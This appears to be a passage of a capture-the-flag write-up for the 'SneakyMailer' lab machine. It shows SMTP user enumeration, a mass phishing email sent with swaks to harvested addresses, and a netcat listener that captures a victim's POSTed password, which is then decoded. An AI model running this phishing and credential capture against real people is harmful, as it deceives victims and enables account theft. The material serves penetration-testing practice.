4 :25 smtp

$ nc -vn 10.10.10.197 25
(UNKNOWN) [10.10.10.197] 25 (smtp) open
220 debian ESMTP Postfix (Debian/GNU)
HELO x
250 debian
VRFY root
252 2.0.0 root
VRFY kashz
550 5.1.1 <kashz>: Recipient address rejected: User unknown in local recipient table

# trying to enumerate users / emails
for emails: ERROR 252: Cannot verify the user, but it will try to deliver the message anyway
for users: ERROR 550: Requested action not taken: mailbox unavailable (e.g., mailbox not found, no access, or command rejected for policy reasons)

# by the name of the box, lets just send a phish email

# using sublime, converted \s to ,
$ emails="airisatou@sneakymailer.htb,angelicaramos@sneakymailer.htb,ashtoncox@sneakymailer.htb,bradleygreer@sneakymailer.htb,brendenwagner@sneakymailer.htb,briellewilliamson@sneakymailer.htb,brunonash@sneakymailer.htb,caesarvance@sneakymailer.htb,carastevens@sneakymailer.htb,cedrickelly@sneakymailer.htb,chardemarshall@sneakymailer.htb,colleenhurst@sneakymailer.htb,dairios@sneakymailer.htb,donnasnider@sneakymailer.htb,doriswilder@sneakymailer.htb,finncamacho@sneakymailer.htb,fionagreen@sneakymailer.htb,garrettwinters@sneakymailer.htb,gavincortez@sneakymailer.htb,gavinjoyce@sneakymailer.htb,glorialittle@sneakymailer.htb,haleykennedy@sneakymailer.htb,hermionebutler@sneakymailer.htb,herrodchandler@sneakymailer.htb,hopefuentes@sneakymailer.htb,howardhatfield@sneakymailer.htb,jacksonbradshaw@sneakymailer.htb,jenagaines@sneakymailer.htb,jenettecaldwell@sneakymailer.htb,jenniferacosta@sneakymailer.htb,jenniferchang@sneakymailer.htb,jonasalexander@sneakymailer.htb,laelgreer@sneakymailer.htb,martenamccray@sneakymailer.htb,michaelsilva@sneakymailer.htb,michellehouse@sneakymailer.htb,olivialiang@sneakymailer.htb,paulbyrd@sneakymailer.htb,prescottbartlett@sneakymailer.htb,quinnflynn@sneakymailer.htb,rhonadavidson@sneakymailer.htb,sakurayamamoto@sneakymailer.htb,sergebaldwin@sneakymailer.htb,shaddecker@sneakymailer.htb,shouitou@sneakymailer.htb,sonyafrost@sneakymailer.htb,sukiburks@sneakymailer.htb,sulcud@sneakymailer.htb,tatyanafitzpatrick@sneakymailer.htb,thorwalton@sneakymailer.htb,tigernixon@sneakymailer.htb,timothymooney@sneakymailer.htb,unitybutler@sneakymailer.htb,vivianharrell@sneakymailer.htb,yuriberry@sneakymailer.htb,zenaidafrank@sneakymailer.htb,zoritaserrano@sneakymailer.htb"

# using swaks to send email to all

$ swaks --to $emails --from kashz@sneakmailer.htb --header "kashz" --body "http://10.10.16.7/" --server 10.10.10.197
[truncated]

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.197 - - [29/Sep/2021 19:08:10] code 501, message Unsupported method ('POST')
10.10.10.197 - - [29/Sep/2021 19:08:10] "POST / HTTP/1.1" 501 -

# redoing it with listener to capture the POST request
$ nc -lvnp 80                                                                                                                                                                                                                         130 ⨯
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 44414
POST / HTTP/1.1
Host: 10.10.16.7
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
# url-decode
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

# creds:
paulbyrd@sneakymailer.htb:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Last updated